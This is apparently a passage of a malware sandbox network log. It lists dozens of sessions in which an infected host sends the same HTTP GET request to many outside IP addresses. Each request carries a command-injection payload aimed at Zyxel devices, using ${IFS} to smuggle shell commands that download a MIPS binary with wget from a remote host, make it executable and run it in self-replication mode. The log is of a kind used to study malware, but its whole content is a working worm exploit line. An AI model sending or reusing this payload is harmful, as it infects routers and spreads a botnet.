                                                Jan 29, 2024 07:07:42.191881895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2780192.168.2.2333454104.38.124.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191924095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2781192.168.2.234517625.225.86.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.191991091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2782192.168.2.2337892209.4.99.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192006111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2783192.168.2.235603846.223.111.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192061901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2784192.168.2.2339646179.229.102.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192090034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2785192.168.2.2354842146.155.119.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192125082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2786192.168.2.2341336197.132.121.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192181110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2787192.168.2.2353324209.196.143.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192219973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2788192.168.2.235135062.27.187.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192255974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2789192.168.2.2338604154.2.61.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192295074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2790192.168.2.234199278.141.211.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192351103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2791192.168.2.235139264.247.220.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192388058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2792192.168.2.2357766144.72.12.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192426920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2793192.168.2.233639464.139.213.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192452908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2794192.168.2.233428253.214.142.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192502975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2795192.168.2.2339034181.242.231.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192538977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2796192.168.2.2342266112.203.198.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192589998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2797192.168.2.235567079.208.210.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192627907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2798192.168.2.233785613.12.148.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192671061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2799192.168.2.2351456185.210.67.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192698956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2800192.168.2.235230297.253.143.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192749023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2801192.168.2.234685269.219.188.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192768097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2802192.168.2.2333052177.75.42.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192796946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2803192.168.2.234260677.203.23.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192842960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2804192.168.2.2348698110.196.100.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192869902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2805192.168.2.2345378103.78.185.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192936897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2806192.168.2.234178239.111.25.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.192960024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2807192.168.2.2354022102.153.235.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193006039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2808192.168.2.235850635.72.140.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193052053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2809192.168.2.2353806209.251.82.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193084002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2810192.168.2.233945841.162.149.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193118095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2811192.168.2.2348234194.13.0.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193156958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2812192.168.2.235204431.147.205.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193207979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2813192.168.2.2348702164.63.44.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193255901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2814192.168.2.2360424183.114.224.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193288088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2815192.168.2.2359544192.38.142.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193320990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2816192.168.2.234456486.61.239.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193363905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2817192.168.2.2354438109.63.74.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193394899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2818192.168.2.235946470.113.100.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193445921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2819192.168.2.2349450150.113.129.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193470955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2820192.168.2.2352036223.116.181.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193502903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2821192.168.2.2342980120.47.34.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193542957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2822192.168.2.2358240145.19.152.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193578959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2823192.168.2.2341236186.126.178.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193628073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2824192.168.2.233386453.186.233.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193661928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2825192.168.2.233620096.2.15.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193708897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2826192.168.2.2350030130.27.167.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193754911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2827192.168.2.233386459.216.228.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193802118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2828192.168.2.2355370161.32.222.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193828106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2829192.168.2.233585648.124.70.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193870068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2830192.168.2.234028286.68.113.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193909883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2831192.168.2.2345262184.209.185.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193943024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2832192.168.2.2334138157.78.243.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.193981886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2833192.168.2.2356302198.135.81.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194030046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2834192.168.2.234790494.215.3.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194066048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2835192.168.2.234665837.213.206.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194113016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2836192.168.2.2335508172.178.182.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194124937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2837192.168.2.234005266.5.23.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194166899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2838192.168.2.2353144118.65.41.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194204092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2839192.168.2.2345906196.67.219.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194251060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2840192.168.2.235624645.24.104.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194274902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2841192.168.2.2343016140.65.80.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194328070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2842192.168.2.2338968216.136.158.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194360971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2843192.168.2.2339580109.129.150.63443
                                                TimestampBytes transferredDirectionData
